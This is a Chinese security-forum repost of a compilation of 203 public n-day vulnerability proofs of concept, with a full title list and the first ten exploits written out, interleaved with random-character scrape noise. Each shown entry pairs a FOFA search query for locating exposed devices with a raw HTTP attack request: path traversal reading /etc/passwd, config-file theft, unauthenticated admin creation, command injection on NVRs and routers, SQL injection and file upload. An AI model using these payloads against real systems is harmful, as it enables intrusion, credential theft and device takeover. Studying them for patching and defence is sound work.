中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406
) z) t; y! N/ W5 }: q道一安全 2024-06-05 07:41 北京5 u0 E8 X- i% r8 r  |+ j
以下文章来源于网络安全新视界 ,作者网络安全新视界% B% U( h& ?- M7 a

6 q' ]. o7 J/ t# a- d  R发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。1 y8 H) G$ o: n+ s0 V
8 {+ ^; s4 [# s) r7 Z
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
# Q) @& [9 `/ }% n4 u: @, A3 E& f1 c. x
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。' B# f& W& N; H5 _3 u

" w; K7 |* X# F2 E# c+ D: F% A文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
+ r' _5 y( Y) f$ N4 Q! R# `! U9 e4 |& o' U
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。5 Z& A' z; x% ]9 ]

7 F& {4 W# Z* N$ E* D' u, v
+ r% U: f, H2 K/ S4 v6 o声明4 b1 r0 L4 C) y( C9 [1 j4 K+ _

& ^" q. g1 G- v9 F. g1 W$ r9 {) B为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
1 W  f' a) f# I4 D( h" b7 }# c
4 U# G3 j2 Q7 V3 t有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。  C3 y4 W1 @4 ~* c6 `

& L, O) U4 v2 U& ~8 R6 l! H
$ a& s9 N) B; a& w. f' n
! q7 Z7 }; a5 b' l4 w% z! d& o目录
/ }4 k7 e; z7 o( l7 `. F$ k* ]/ y$ H' C. m" K1 {
01
7 C1 {6 a8 K5 E9 T' W
3 i; Z% G& r& N/ a0 v% ?1. StarRocks MPP数据库未授权访问
1 s% N/ B& i+ @% a% K2. Casdoor系统static任意文件读取
  w- A6 B9 t/ Q- {3 X% J! n3. EasyCVR智能边缘网关 userlist 信息泄漏
; c6 ~2 P5 L. Y4. EasyCVR视频管理平台存在任意用户添加9 Z5 P  q" ~* V5 }
5. NUUO NVR 视频存储管理设备远程命令执行
1 V' G+ m8 g. O: q# y  @6. 深信服 NGAF 任意文件读取
6 k/ ]; Z# b, f/ b: S, G0 h, ?7. 鸿运主动安全监控云平台任意文件下载) F) P0 Z* @( {; E* P
8. 斐讯 Phicomm 路由器RCE
- r: f" l: @( p9. 稻壳CMS keyword 未授权SQL注入
: k; t/ H& k, c% d3 X- q+ j10. 蓝凌EIS智慧协同平台api.aspx任意文件上传5 o7 T9 b9 M& w8 T: Z
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 ^9 M' N" j* H" [. t
12. Jorani < 1.0.2 远程命令执行
2 ~# \5 F; k$ F13. 红帆iOffice ioFileDown任意文件读取
, B7 @4 d: l9 S. u14. 华夏ERP(jshERP)敏感信息泄露# ^7 e/ B# o/ k$ d
15. 华夏ERP getAllList信息泄露
3 o8 |  ]* [: B8 u16. 红帆HFOffice医微云SQL注入4 @/ z! c( f+ m6 E* A
17. 大华 DSS itcBulletin SQL 注入
$ O) O1 f; r: q7 O+ `7 j18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* z# p9 w6 s: ]8 {0 J) f8 y
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. [  u) }9 z2 l% b
20. 大华ICC智能物联综合管理平台任意文件读取
, J& q. g# [* R3 c21. 大华ICC智能物联综合管理平台random远程代码执行& k) w$ F0 u4 W9 A; I$ @: v* ]' V( s
22. 大华ICC智能物联综合管理平台 log4j远程代码执行* B1 \; y( ?$ g: m+ S" P5 e
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 |3 b2 Q+ g2 |9 S24. 用友NC 6.5 accept.jsp任意文件上传- ~+ m* W' ?! X+ w$ U( [
25. 用友NC registerServlet JNDI 远程代码执行
- g" i% @8 h+ |. r; L& e26. 用友NC linkVoucher SQL注入+ D9 e: d6 S' h: ~0 d) b
27. 用友 NC showcontent SQL注入
# m7 T- B" ?; S* E4 u: M" R. k1 U( g28. 用友NC grouptemplet 任意文件上传
; Q* T1 y; B+ l8 i  V4 j* O8 ?29. 用友NC down/bill SQL注入( s7 T" @5 M7 R
30. 用友NC importPml SQL注入3 Q, M& _( p+ W9 A* j3 |6 {7 Z: o
31. 用友NC runStateServlet SQL注入
5 r9 i8 P+ ]* ]+ B$ X' y: r32. 用友NC complainbilldetail SQL注入
5 @4 a" F. Q& p, B( A33. 用友NC downTax/download SQL注入8 o/ A; @( ^# v
34. 用友NC warningDetailInfo接口SQL注入
' V8 H' t9 y2 b35. 用友NC-Cloud importhttpscer任意文件上传
" R$ [9 L# g8 x" M/ n( J36. 用友NC-Cloud soapFormat XXE5 u, d; f6 f6 P8 R- V
37. 用友NC-Cloud IUpdateService XXE: P  C4 {4 o! h2 [0 v  w
38. 用友U8 Cloud smartweb2.RPC.d XXE
& ~" @/ E- z$ c- N39. 用友U8 Cloud RegisterServlet SQL注入
7 W6 a) W! o' _' K- |7 L0 D40. 用友U8-Cloud XChangeServlet XXE0 q0 J$ k0 J. H2 w: F1 k
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ O# W5 m7 J9 w2 H, g42. 用友GRP-U8 SmartUpload01 文件上传# h! `" O  a! Z
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
! R& s# u# ?; l) Q2 p9 |: ~44. 用友GRP-U8 bx_dj_check.jsp SQL注入
0 G3 {' G: ?$ b, r7 y, Q45. 用友GRP-U8 ufgovbank XXE
" |8 U- A: A8 N7 ?7 i46. 用友GRP-U8 sqcxIndex.jsp SQL注入
- x" ]4 C8 f* g8 t47. 用友GRP A++Cloud 政府财务云 任意文件读取8 f2 c1 b; _; J9 d
48. 用友U8 CRM swfupload 任意文件上传# w, `" d1 }' g6 q7 ^
49. 用友U8 CRM系统uploadfile.php接口任意文件上传+ O* a( U2 L* S: Q' ]
50. QDocs Smart School 6.4.1 filterRecords SQL注入5 I) J. }- Y4 h  j! H' l3 o4 X
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入# I/ @. T. V+ S. M5 z
52. 泛微E-Office json_common.php sql注入' G' }7 L! r. [: k6 a
53. 迪普 DPTech VPN Service 任意文件上传
' ^9 m0 K. L3 X54. 畅捷通T+ getstorewarehousebystore 远程代码执行
1 j0 v; }1 B! L! D- c( \0 |6 U55. 畅捷通T+ getdecallusers信息泄露
! ^" E6 K- ^8 k& J0 }7 G56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 m4 N! X# U- e% T% J0 x4 k
57. 畅捷通T+ keyEdit.aspx SQL注入
+ k- O* k# v: Z5 u5 Z8 h58. 畅捷通T+ KeyInfoList.aspx sql注入
& f! Z2 y" _3 q( j2 z" _59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, R% C9 Y* v% m! Q$ `5 Z4 r60. 百卓Smart管理平台 importexport.php SQL注入$ D$ v6 `5 Y$ U( K2 x( {, ]( {
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% Q0 G% w3 p1 T* [- [! C
62. IP-guard WebServer 远程命令执行
  |, }( }: ?$ c4 E/ c" @0 x6 S63. IP-guard WebServer任意文件读取! u+ G) g2 h1 c; W# D( m6 B
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, [. h: ], `# L- o1 F% t
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
. p4 g3 W, ^% |' ~) S66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& ~+ ~' {9 D6 z% r$ C! M67. 万户ezOFFICE wpsservlet任意文件上传# R1 `" T4 A9 m2 I2 t( \0 W- y
68. 万户ezOFFICE wf_printnum.jsp SQL注入  k/ S1 Q( q" F7 u$ I+ ~# U4 K
69. 万户 ezOFFICE contract_gd.jsp SQL注入  k5 _3 Q* \6 r/ z) [! x7 \& K7 o
70. 万户ezEIP success 命令执行
6 i0 P8 W0 W+ ^5 F6 N5 [71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. q5 |9 ?% w7 @  q* O4 Z( [  ~4 D/ m72. 致远OA getAjaxDataServlet XXE2 b5 \& s( Q9 ~) z; h% Y
73. GeoServer wms远程代码执行& |. I: p6 ?, K" J
74. 致远M3-server 6_1sp1 反序列化RCE
, L! g) d& T9 D6 v2 e( R/ S2 G2 U. h' [75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' e7 d5 H: r2 ]' |, x7 R" Q76. 新开普掌上校园服务管理平台service.action远程命令执行& d( ^1 U1 ^1 G4 D- \: Z2 h/ P
77. F22服装管理软件系统UploadHandler.ashx任意文件上传9 ?  C8 S0 R9 v+ M
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' i0 O& h& X3 |0 j9 u1 W79. BYTEVALUE 百为流控路由器远程命令执行4 w4 X& P  |% e; t& Y. O1 b5 l% c
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' M4 w; ]- |+ P81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露/ z  g3 `& ^* p- _8 T, d
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行! @. X+ C- I: R# T6 ~
83. JeecgBoot testConnection 远程命令执行
; O( A' Z8 H8 }& Y84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) ~" E6 ~  o( B& M
85. SysAid On-premise< 23.3.36远程代码执行
0 T. p! ?: N: [: Y  m86. 日本tosei自助洗衣机RCE6 R) L. b* F" P6 {9 b  }
87. 安恒明御安全网关aaa_local_web_preview文件上传
% c) w$ k8 ?& `! A- G: b( \88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行4 w: k2 h/ c) l3 N% _( r4 a
89. 致远互联FE协作办公平台editflow_manager存在sql注入
- j9 F% u1 B* u* {4 L6 `3 m90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行9 H9 k! h# l& H3 f5 l  O
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
  \/ v' A4 W* Y7 }92. 海康威视运行管理中心session命令执行
" ]4 P0 ?# E9 r9 U. }6 u! g1 f( n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. D2 @3 q( T2 h5 @5 R% ?94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* ]+ U5 |0 s& ~# ^
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) o- e" G( N3 C' k8 A96. Apache OFBiz  18.12.11 groovy 远程代码执行$ p5 P0 X: V) {1 {' m
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 _1 h0 {0 G) S+ I- ?! c$ g98. SpiderFlow爬虫平台远程命令执行
1 \+ A) F& x1 n+ j  m99. Ncast盈可视高清智能录播系统busiFacade RCE
" A' V) ?2 h' `, u- D5 r100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
# e& C7 C& _9 Q) Q101. ivanti policy secure-22.6命令注入* j5 @7 Z! _1 }) ^+ r3 \% r' l
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
# n' x$ i: ]: N4 }: t/ Y: c2 X103. Ivanti Pulse Connect Secure VPN XXE
% U& D3 o( S5 g7 u104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露: _% o. I- q( {, g! M: ?
105. SpringBlade v3.2.0 export-user SQL 注入# L' \' g/ L6 z
106. SpringBlade dict-biz/list SQL 注入
9 [( r8 L* ^3 y7 Q% X107. SpringBlade tenant/list SQL 注入
6 H- }+ `1 b$ }+ ^; V) E( J108. D-Tale 3.9.0 SSRF5 ~! I; R# u* n3 v6 H$ u* x
109. Jenkins CLI 任意文件读取
: P- j$ R* m2 g2 Y& M0 Q, A. b110. Goanywhere MFT 未授权创建管理员, V- Y: ]: K* c2 m, `+ K- n1 X
111. WordPress Plugin HTML5 Video Player SQL注入
( v- {$ |6 B) g  U3 i0 \9 T7 b112. WordPress Plugin NotificationX SQL 注入3 u2 A* O- o) y4 A( _; F# O. z
113. WordPress Automatic 插件任意文件下载和SSRF
+ }2 |! W% @1 G# \0 Y4 j6 E& T/ d114. WordPress MasterStudy LMS插件 SQL注入
$ l; w+ y% n2 K/ d2 ?) [115. WordPress Bricks Builder <= 1.9.6 RCE- S8 v/ [. m+ F1 s4 T2 q1 w: q
116. wordpress js-support-ticket文件上传
+ N6 t9 H; C* v" x8 @% j117. WordPress LayerSlider插件SQL注入
5 x% @2 B! e# t7 S, N( b( l118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 ~, @) V3 T8 p% h119. 北京百绰智能S20后台sysmanageajax.php sql注入
' J, r# n0 r3 Y; y& J6 l120. 北京百绰智能S40管理平台导入web.php任意文件上传2 G  l1 ~  E8 ]5 r7 Z- p
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
  k" f3 b; T8 J" f; B; p# p' |122. 北京百绰智能s200管理平台/importexport.php sql注入
! s$ `6 l4 d( z/ n' G& j123. Atlassian Confluence 模板注入代码执行
2 R4 Z( @; K& u! X! A& ]8 M8 F124. 湖南建研工程质量检测系统任意文件上传
8 \; p% F8 ~5 ?1 n) g' i125. ConnectWise ScreenConnect身份验证绕过; s3 N, F( z+ N3 i6 x
126. Aiohttp 路径遍历" U  l* _  e- ~, C6 ]0 ^/ q
127. 广联达Linkworks DataExchange.ashx XXE+ c1 _+ G. k/ J
128. Adobe ColdFusion 反序列化
8 @) X# H+ E# |0 N% o8 O! y129. Adobe ColdFusion 任意文件读取
0 H6 h  Z7 W- h' m130. Laykefu客服系统任意文件上传
# A, F- j' o+ q+ d$ n131. Mini-Tmall <=20231017 SQL注入. {5 O8 B% z7 i+ D
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' D9 D7 e( N; S' g0 U$ G* z3 `
133. H5 云商城 file.php 文件上传
  B2 V0 b! u2 ?* \& Q134. 网康NS-ASG应用安全网关index.php sql注入0 @4 C" P6 ?& w0 f4 m0 v
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) P, E! }2 |2 T% R136. NextChat cors SSRF
' r. j* O4 I' {' o! m9 E  W137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 h& K- J" U  u3 ^138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 {7 q4 o' l+ l, }9 K: ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) O0 W; @* j" w* e140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- b8 e* D+ ^' N. x
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 r% {7 D2 l* s2 B( D4 `6 f/ t142. CMSV6车辆监控平台系统中存在弱密码
0 R4 H* }: |7 O: ~! b143. Netis WF2780 v2.1.40144 远程命令执行
9 L. M9 C+ d% }! M% S0 S  D7 W144. D-Link nas_sharing.cgi 命令注入
+ L: x9 A5 c4 d: P145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, {/ `; j. Y- R" Z6 y
146. MajorDoMo thumb.php 未授权远程代码执行
+ P2 _- y0 l2 R, ?9 Y8 n3 j147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  v) J9 E3 k8 Y! e148. CrushFTP 认证绕过模板注入
/ ^: I2 _5 K# I# Z; L# T5 D149. AJ-Report开源数据大屏存在远程命令执行, P9 X) h  @. e
150. AJ-Report 1.4.0 认证绕过与远程代码执行( i$ P0 M& C: E7 j
151. AJ-Report 1.4.1 pageList sql注入% ~) p; @1 k9 t: l/ j" s% @0 ]
152. Progress Kemp LoadMaster 远程命令执行1 |0 g! b+ \0 a( i+ g0 ?
153. gradio任意文件读取
# P- |% p! m9 }+ c0 @154. 天维尔消防救援作战调度平台 SQL注入# ^7 ]  _1 v/ g9 g, K
155. 六零导航页 file.php 任意文件上传, S' e" u5 w3 ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
5 J  y  X  _0 C  V3 k* S157. 美特CRM upload.jsp 任意文件上传
/ Y, g. b. K! E# c158. Mura-CMS-processAsyncObject存在SQL注入5 Y3 {% I2 O. D' f# B
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传* S! \: Z& s% `" S$ j  U% u
160. Sonatype Nexus Repository 3目录遍历与文件读取/ t5 z* @+ C8 ?1 E$ @
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ G! P5 ]6 M$ ^5 C$ G162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
2 W6 P( }8 J' F# J" ?163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 j9 T5 o7 ?' r& Q( {3 O164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ r' n; S2 [6 s4 T( w6 D2 k
165. OrangeHRM 3.3.3 SQL 注入
' t5 ]- s" k  G5 ~& e& c8 E/ v166. 中成科信票务管理平台SeatMapHandler SQL注入' d/ n2 y- c& _  n, [9 P% X
167. 精益价值管理系统 DownLoad.aspx任意文件读取& X; q! ]* K, B" Y' z! d
168. 宏景EHR OutputCode 任意文件读取1 P0 T% Z% f$ p  W6 k  p
169. 宏景EHR downlawbase SQL注入
. \+ h( X7 `8 E* g- I170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 h1 ~0 |0 O( P+ V. E1 M0 ?
171. 通天星CMSV6车载定位监控平台 SQL注入, g6 D4 A; L' H% D( S1 e( {
172. DT-高清车牌识别摄像机任意文件读取( d% n1 g! ]* E' r  E% y! z
173. Check Point 安全网关任意文件读取3 t9 O0 [  s) n8 ~& V* A
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
( _/ R0 T/ J6 H9 D* @1 U175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
, }1 @: K- Y  G3 Q3 z* k8 f176. 电信网关配置管理系统 rewrite.php 文件上传& ^/ g0 ?& G" G" g3 C8 J
177. H3C路由器敏感信息泄露3 p# G% `" A) ~/ J
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 ?8 R6 Q/ w0 a8 }179. 建文工程管理系统存在任意文件读取# d9 t0 p8 S( |5 L1 E" M6 H; F1 P1 L
180. 帮管客 CRM jiliyu SQL注入
! x& {% D. C6 G4 \181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
& W7 \0 I- s, s& D9 Z2 k) ?; ^182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建# l, a8 k9 p6 W
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( z; I# l7 m! {/ ?+ {% u184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ Y0 V6 w# e  c+ l185. 瑞友天翼应用虚拟化系统SQL注入
8 D( Z  ?7 M! l( U! i" {) S* g186. F-logic DataCube3 SQL注入1 y+ |8 b  o0 v1 M# F6 H- S
187. Mura CMS processAsyncObject SQL注入# h! a! h6 j2 R0 k" o; Z
188. 叁体-佳会视频会议 attachment 任意文件读取
7 |$ @  W4 B6 R) s9 }* r& ^8 S& |6 O) z189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 `4 x, i! }  Y8 M( Z) H6 n190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 s$ U8 M+ o4 M# ^191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 A6 y' X/ F' F# z1 l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
& R+ ]2 E4 r+ I' W, d9 ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 a$ i0 W1 G& Y3 B194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 _: ]3 N* ]4 t. m' N195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
  @. ^. o$ L0 m0 `5 M9 ]! f$ M196. 河南省风速科技统一认证平台密码重置
7 x9 A: O2 p+ n! Q, W; s# W197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% p& w- }8 r' M, v$ U
198.  阿里云盘 WebDAV 命令注入
2 }0 x: A9 M; ]" B* J2 h199. cockpit系统assetsmanager_upload接口 文件上传9 b4 _. Z: c) e, L+ i# c
200. SeaCMS海洋影视管理系统dmku SQL注入
4 }# }% ?1 u# L201. 方正全媒体新闻采编系统 binary SQL注入
' r: c- w9 q/ K3 A7 A$ l7 H% D202. 微擎系统 AccountEdit任意文件上传
' Q3 l# x; P: T5 P- |# R203. 红海云EHR PtFjk 文件上传* t) W  c1 E, p0 s8 L) h0 z" x1 i

% w- Z6 S, U9 I: u5 Z4 qPOC列表
( A4 \: x; @8 j3 o0 M: ^' J4 k7 [6 u! a& _/ u3 V6 ~
02; `( K; F8 K) t
2 [/ v9 G& }9 X! K/ s
1. StarRocks MPP数据库未授权访问$ k& m: b2 t3 E
FOFA :title="StarRocks"
7 R8 G: P" ^1 ~$ z/ Q- W, c! n+ SGET /mem_tracker HTTP/1.17 p3 J2 `9 G7 D  L' w* y# ~
Host: URL
6 s3 E* q. r( m# d1 Y8 ?
9 x: X3 _* p; t
5 T: s% ^( W& T  e2. Casdoor系统static任意文件读取
( h- M+ [, X: n( j; `FOFA :title="Casdoor"
1 P$ ~" r5 ?7 h  }: HGET /static/../../../../../../../../../../../etc/passwd HTTP/1.16 h3 ~0 P9 W# x3 ]
Host: xx.xx.xx.xx:99992 _' b% ~( m$ _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! b. v. D* K* G5 UConnection: close
. H7 M, c8 a% L# k. ^3 }Accept: */*
7 q6 g4 w0 R, j$ |8 H" @Accept-Language: en
: s" s; R/ v) [Accept-Encoding: gzip
0 F8 D  F( k, W5 t. z2 \
% ]" _; \' u& N- [! h! E; v, \+ Z  a' K  |; e
3. EasyCVR智能边缘网关 userlist 信息泄漏  S2 ~, h1 K/ M
FOFA :title="EasyCVR"0 j; K3 A3 z4 N( w4 o  y# N# r
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ G4 n& z. S% W$ |, H" O% bHost: xx.xx.xx.xx- r5 \7 h# x3 e( z. u; o) a

6 B" t& f" e  n. }: b" j2 p- l& u5 t7 Q( C
4. EasyCVR视频管理平台存在任意用户添加
: C* Z/ G' n9 }. k8 s% U  ^2 Y- jFOFA :title="EasyCVR"
( A1 t  i7 ]+ X5 y0 l* z9 t2 S& ]
' ]- i0 ~2 [( vpassword更改为自己的密码md5
- ?' p5 I1 E9 S9 h- cPOST /api/v1/adduser HTTP/1.11 b- y- e/ B, l- @
Host: your-ip
! r1 m! M9 |: D3 w( c" Z( n; |Content-Type: application/x-www-form-urlencoded; charset=UTF-8! g3 Y9 H# B* C' G1 g

/ ]4 q/ h. z6 [name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
; G. T5 |# Y7 G& l3 Z) n* R& `5 F) U
+ V3 J$ Q4 s# J) S3 }4 h
5. NUUO NVR 视频存储管理设备远程命令执行! C0 W0 k( u* s1 h
FOFA:title="Network Video Recorder Login") T  T7 r- \7 p  Q' D
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
, s' y1 u4 p7 h0 v3 P1 |6 v* u, iHost: xx.xx.xx.xx7 w" i: c+ A& v  u0 f; }$ D  I

/ F+ V% `8 q& Z) S  U4 k) c5 I& A
6 l" T. f% [0 x2 C6. 深信服 NGAF 任意文件读取3 ^3 j+ q; i4 p
FOFA:title="SANGFOR | NGAF"- C$ ~4 b4 {9 D3 G( j
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.14 {0 H) U, g  ^. A/ a
Host:
( Z8 _- w9 d0 x/ F: \. e" A5 C0 Q5 N4 w
/ z0 r$ E6 Z. \  t$ ~, p
7. 鸿运主动安全监控云平台任意文件下载
! y" C% G+ C6 ~5 n! l1 U4 k. qFOFA:body="./open/webApi.html"5 j2 {, H8 @; u6 I5 Z+ {! n
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
* Z) {3 ]$ }% AHost:
6 g( G4 l+ B- T$ T/ F0 e* x+ t# {- Q& I

, H' @: y& o2 O! F; I8 a8. 斐讯 Phicomm 路由器RCE2 u+ x$ \9 i8 z  R1 i2 {: A, G
FOFA:icon_hash="-1344736688"1 e4 L- ^# X: F) F* Z
默认账号admin登录后台后,执行操作
! m2 l( C/ ~9 i5 |* R* LPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1' a% _8 a- F8 T
Host: x.x.x.x7 Y. P1 R% t7 i0 q" Y
Cookie: sysauth=第一步登录获取的cookie
- k, \# {% R$ v1 H3 o7 ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz4 _, O' |4 }7 G6 s! o1 D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1 _6 \  f' F& l, o: A( ^  o- g$ Q# H, {1 |
------WebKitFormBoundaryxbgjoytz% K  [( n) h9 ^- H
Content-Disposition: form-data; name="wifiRebootEnablestatus"
4 c5 |5 S- ^8 R* H" L/ r1 D) Z7 ], E' i/ i
%s
; ]7 t, H2 S; {! n# V6 F- f------WebKitFormBoundaryxbgjoytz
# t( C  M+ M  k4 O8 vContent-Disposition: form-data; name="wifiRebootrange"
+ Z- K3 {/ G: d$ Q# R( m8 i
& e  ?1 e' G- ^$ q; ?12:00; id;
6 m4 G$ V1 Z7 }# i9 S5 ~1 \4 V* @------WebKitFormBoundaryxbgjoytz
% S5 s& w$ ~  q; t5 W. CContent-Disposition: form-data; name="wifiRebootendrange"8 w, j- G* J, F# U/ T
& b( H# m& i9 U: n$ X
%s:
& Z; o; p% {. h: ^------WebKitFormBoundaryxbgjoytz
+ h+ D% m8 I7 q5 kContent-Disposition: form-data; name="cururl2"* m+ ^/ i. i% _
# u4 O2 h, V' J( A* S/ `

( |  d1 c6 n2 I! c, x------WebKitFormBoundaryxbgjoytz--8 R2 r5 M) W/ s0 P$ ?8 f; x

4 @2 z, Q$ J; W. n7 Z! l; s, F6 u5 K1 O$ e# D! I# w
9. 稻壳CMS keyword 未授权SQL注入
( S6 T; j) [" y. {FOFA:app="Doccms"
* Q6 K( P. |! `  j# A' d0 a* oGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.11 G" z/ H+ O+ _* k, o: u4 A
Host: x.x.x.x: v; n( ]7 n! ^2 f2 y! x- p
. o5 _" O: U# ^

3 a6 g, D5 p, K- u4 Xpayload为下列语句的二次Url编码
  b& \$ a' |$ ^6 }* l
+ N  L4 r5 m! U: y+ Y4 Z& m' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#6 ?: g6 r6 W& v9 g% x; U
# {6 r; e( X  m$ [; n
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传. @) [( M# m7 ^4 l, j1 r
FOFA:icon_hash="953405444"6 U1 L0 K& \7 o! p8 H: D& P! J
9 ~" j  }- Z- f+ y" @. I6 k) B
文件上传后响应中包含上传文件的路径# b8 K- _3 ^' i0 ~, u" y: b# N
POST /eis/service/api.aspx?action=saveImg HTTP/1.17 v) {* Z0 }3 P2 t7 ]
Host: x.x.x.x:xx
) |- b4 e& V! ?0 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36. e6 l" I6 M: n1 \9 P* b
Content-Length: 1975 j$ Y4 r9 r% H) ]& Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) n) Y$ a% B! {% a  J& G, K6 H
Accept-Encoding: gzip, deflate
- {) y/ d$ }( E0 ^/ bAccept-Language: zh-CN,zh;q=0.99 ^: H4 j- T; B0 t6 {6 ~/ P2 M, o5 ?
Connection: close7 f2 o% l/ v7 B5 `: L+ _! c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu* v7 M  M. R6 ~4 l
8 Z+ {; {: }/ ?$ J3 r; D
------WebKitFormBoundaryxdgaqmqu
) q" j8 Y5 _; h  \Content-Disposition: form-data; name="file"filename="icfitnya.txt") W6 _4 ~3 K, p# W& q0 \
Content-Type: text/html# j- j8 D  I- H) v2 j$ W# k

9 C$ v& j* ^: K7 @$ ?8 Z  Fjmnqjfdsupxgfidopeixbgsxbf
" l1 c1 i' Y" ^5 c) }9 E8 N------WebKitFormBoundaryxdgaqmqu--
. c1 q0 F$ C" w/ M
1 b! M: i  g) q& {1 D8 Z
